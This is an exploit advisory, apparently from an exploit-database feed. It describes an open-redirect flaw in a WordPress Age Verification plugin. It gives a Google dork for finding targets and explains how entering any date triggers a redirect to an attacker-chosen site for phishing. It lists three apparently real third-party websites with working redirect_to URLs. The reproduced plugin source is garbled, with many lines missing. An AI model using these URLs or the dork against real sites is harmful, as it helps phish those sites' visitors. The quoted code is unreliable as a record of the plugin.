
# Exploit Title : WordPress 5.0.4 Age-Verification Plugins 0.5 Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/03/2019
# Vendor Homepages : coveredweb.com - coveredwebservices.com 
# Software Download Link : downloads.wordpress.org/plugin/age-verification.zip
# Software Information Link : 
# Software Affected Versions : 
WordPress Version 4.9.10 - 5.0.4 and lower versions - Plugin Version 0.5 - 0.4 is vulnerable
Required at least WordPress 3.3.1 and 3.2 and higher
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/wp-content/plugins/age-verification/
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos


# Information About Software :
Requires users to provide their date of birth before they can access your site.

This plugin forces users to provide their date of birth before they can access your site.  

Their age must meet some configurable age.  

Their age will be remembered in a cookie that will last for a configurable duration.  

Plain text fields or dropdown fields can be configured.  The interface is bare -- it is expected that you will do some work 

to integrate this into your site's design.  You can also exclude registered users 

from the name check (for instance, so authors aren't subjected to it).


# Impact :
This web application WordPress 5.0.4 Age-Verification Plugins 0.5 and 0.4 versions accepts a user-controlled input that 

specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. 

An http parameter may contain a URL value and could cause the web application to redirect the request to the 

specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam

 and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts 

have a more trustworthy appearance. Open redirect is a failure in that process that makes it possible for attackers 

to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious 

sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name 

has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes 

affected by malware the task of which is to deceive the valid actor and steal his personal data.


# Vulnerable Source Code : [ age-verification.php ]
Plugin Name: Age Verification
Description: Verifies a visitor's age before any pages can be viewed
Version: 0.5
Author: Mark Jaquith
Author URI: http://coveredwebservices.com/

    Copyright 2008-2012 Mark Jaquith

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

if ( !defined( 'ABSPATH' ) ) { // we're being called directly, for age verification

	if ( file_exists('../../wp-config.php') )
	elseif ( file_exists('../../../wp-config.php') )
		die('Could not find wp-config.php');

	if ( $_POST ) {
		foreach ( array( 'year', 'month', 'day' ) as $unit )
			$_POST['age_' . $unit] = absint( ltrim( $_POST['age_' . $unit], '0' ) );
		if (
			$_POST['age_year'] < 1900 ||
			$_POST['age_month'] < 1 ||
			$_POST['age_month'] > 12 ||
			$_POST['age_day'] < 1 ||
			$_POST['age_day'] > 31
		) {
			wp_redirect( cws_age_verification::plugin_url() . '?wrongformat=1&redirect_to=' . urlencode( stripslashes( $_POST['redirect_to'] ) ) );
		$dob = $_POST['age_year'] . '-' . zeroise( $_POST['age_month'], 2 ) . '-' . zeroise( $_POST['age_day'], 2 );
		wp_safe_redirect( $_POST['redirect_to'] );
	} else { ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
		<title>Age Verification Required</title>
		<h1>Age Verification Required</h1>
		<?php if ( !$_COOKIE['cws_age_verification_cookie_check'] ) : ?>
			<p>This site requires your date of birth, but your browser isn't accepting cookies.  Please enable cookies and try visiting this site again.</p>
			<?php cws_age_verification::footer(); ?>
		<?php endif; ?>
		<?php if ( $_GET['notoldenough'] ) : ?>
			<p><strong>You are not old enough to access this site!</strong></p>
		<?php elseif ( $_GET['wrongformat'] ) : ?>
			<p><strong>Your date of birth must be in the format <code>MM DD YYYY</code> and must be a valid date!</strong></p>
		<?php endif; ?>
		<p>You must be <?php echo cws_age_verification::age_required(); ?> years old to access this site. Please provide your date of birth:</p>
		<form action="" method="post">
			<input type="hidden" name="redirect_to" value="<?php echo clean_url( stripslashes( $_REQUEST['redirect_to'] ) ); ?>" />
			<?php if ( get_option( 'cws_age_verification_use_dropdowns ' ) ) : ?>
				<select name="age_month">
					for ( $i=1; $i<13; $i++ )
						echo '<option value="' . $i . '">' . gmdate( 'F', gmmktime( 0, 0, 0, $i, 1, 0 ) ) . '</option>';
				<select name="age_day">
					for ( $i=1; $i<32; $i++ )
						echo '<option value="' . zeroise( $i, 2 ) . '">' . zeroise( $i, 2 ) . '</option>';
				<select name="age_year">
					for ( $i = date('Y'); $i > date('Y') - 110; $i-- )
						echo '<option value="' . $i . '">' . $i . '</option>';
			<?php else : // plain text inputs ?>
				<input name="age_month" type="text" maxlength="2" value="MM"   onfocus="this.value='';" style="width: 2em;" />
				<input name="age_day"   type="text" maxlength="2" value="DD"   onfocus="this.value='';" style="width: 2em;" />
				<input name="age_year"  type="text" maxlength="4" value="YYYY" onfocus="this.value='';" style="width: 4em;" />
			<?php endif; ?>
			<input type="submit" value="Verify Age &raquo;" />

class cws_age_verification {

	function footer() {
		echo "</body></html>";

	function check() {
		if ( current_user_can( 'read' ) && get_option( 'cws_age_verification_skip_registered' ) ) {
			// nothing -- let them pass
		} elseif ( !$_COOKIE['cws_age_verification_dob'] ) {
			wp_redirect( cws_age_verification::plugin_url() . '?redirect_to=http://' . $_SERVER['HTTP_HOST'] . urlencode($_SERVER['REQUEST_URI'] ) );
		} elseif ( cws_age_verification::age_required() > cws_age_verification::dob_to_age( $_COOKIE['cws_age_verification_dob'] ) ) {
			wp_redirect( cws_age_verification::plugin_url() . '?notoldenough=1&redirect_to=http://' . $_SERVER['HTTP_HOST'] . urlencode($_SERVER['REQUEST_URI'] ) );
		} else {
			cws_age_verification::set_dob( $_COOKIE['cws_age_verification_dob'] ); // keep-alive

	function plugin_url() {
		return get_option( 'siteurl' ) . '/' . PLUGINDIR . '/' . plugin_basename( __FILE__ );

	function age_required() {
		return absint( get_option( 'cws_age_verification_age' ) );

	function timeout_minutes() {
		return absint( get_option( 'cws_age_verification_timeout' ) );


	function timeout_seconds() {
		return 60 * cws_age_verification::timeout_minutes();

	function set_test() {
		setcookie( 'cws_age_verification_cookie_check', '1', time() + 3600,     COOKIEPATH, COOKIE_DOMAIN );
		setcookie( 'cws_age_verification_cookie_check', '1', time() + 3600, SITECOOKIEPATH, COOKIE_DOMAIN );

	function set_dob( $dob ) {
		setcookie( 'cws_age_verification_dob', $dob, time() + cws_age_verification::timeout_seconds(),     COOKIEPATH, COOKIE_DOMAIN );
		setcookie( 'cws_age_verification_dob', $dob, time() + cws_age_verification::timeout_seconds(), SITECOOKIEPATH, COOKIE_DOMAIN );

	function dob_to_age( $birthdate ) {
		// birthdate should be in yyyy-mm-dd form
		if ( $birthdate ) {
			$birth = date( 'Ymd', strtotime( $birthdate ) );
			$age = date( 'Y' ) - substr( $birth, 0, 4 );
			if ( date( 'md' ) < substr( $birth, 4, 4 ) )
			return $age;

	function admin() {
		if ( !empty( $_POST ) ) {
			if ( function_exists( 'current_user_can' ) && !current_user_can( 'manage_options' ) )
				die( __( 'Cheatin&#8217; uh?' ) );
			check_admin_referer( 'cws-age-verification-update-settings' );
			update_option( 'cws_age_verification_age',             absint( $_POST['cws-age-setting'] )              );
			update_option( 'cws_age_verification_timeout',         absint( $_POST['cws-timeout-setting'] )          );
			update_option( 'cws_age_verification_skip_registered', ( $_POST['cws-registered-setting'] ) ? '1' : '0' );
			update_option( 'cws_age_verification_use_dropdowns',   ( $_POST['cws-dropdown-setting'] ) ? '1' : '0'   );
		if ( !empty($_POST ) ) { ?>
		<div id="message" class="updated fade"><p><strong><?php _e( 'Options saved.' ) ?></strong></p></div>
		<?php } ?>
		<div class="wrap">
			<h2>Age Verification Settings</h2>
				<form action="" method="post" id="age-verification-settings">
					<?php wp_nonce_field( 'cws-age-verification-update-settings' ); ?>
					<p>Users must be at least <input style="width:2em;" type="text" name="cws-age-setting" value="<?php echo attribute_escape( cws_age_verification::age_required() ); ?>" maxlength="2" /> years old to access this site, and will have to reverify their age after <input style="width:4em;" type="text" name="cws-timeout-setting" value="<?php echo attribute_escape( cws_age_verification::timeout_minutes() ); ?>" maxlength="4" /> minutes of inactivity.</p>
					<p><input type="checkbox" <?php checked( get_option( 'cws_age_verification_skip_registered' ), '1' ); ?> value="1" name="cws-registered-setting" id="cws-registered-setting" /> <label for="cws-registered-setting">Logged in users of this site do not have to verify their age.</label></p>
					<p>Age verification should use <select name="cws-dropdown-setting"><option value="1" <?php selected( get_option( 'cws_age_verification_use_dropdowns' ), '1' ); ?>>dropdown</option><option value="0" <?php selected( get_option( 'cws_age_verification_use_dropdowns' ), '0' ); ?>>plain text</option></select> inputs.</p>
					<p class="submit"><input type="submit" value="Save options &raquo;" /></p>


function cws_age_verification_admin() {
	add_option( 'cws_age_verification_age',             '13' ); // default to 13 because of COPPA
	add_option( 'cws_age_verification_timeout',         '60' ); // one hour
	add_option( 'cws_age_verification_skip_registered', '1'  );
	add_option( 'cws_age_verification_use_dropdowns',   '1'  );
	if ( function_exists( 'add_submenu_page' ) )
		add_submenu_page( 'plugins.php', 'Age Verification', 'Age Verification Settings', 'manage_options', 'age-verification', array( 'cws_age_verification', 'admin' ) );

add_action( 'init', create_function( '$a', "add_action( 'admin_menu', 'cws_age_verification_admin' );" ) );
add_action( 'template_redirect', array( 'cws_age_verification', 'check' ) );



# Vulnerable File :

# Vulnerable Parameter :


# Choose =>
Day 1 - Month 1 - Year 1900

or you can choose any numbers and it will redirect to your desired website address.

# Open Redirection Exploit :


# Example Vulnerable Sites :
[+] paulanerhpusa.com/paulanerhpusa_wp/wp-content/plugins/age-verification/age-verification.php?redirect_to=https://cxsecurity.com/

[+] siebrand.nl/wp-content/plugins/age-verification/age-verification.php?notoldenough=1&redirect_to=https://cxsecurity.com/

[+] reggiani.ind.br/wp-content/plugins/age-verification/age-verification.php?notoldenough=1&redirect_to=https://cxsecurity.com/


# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 
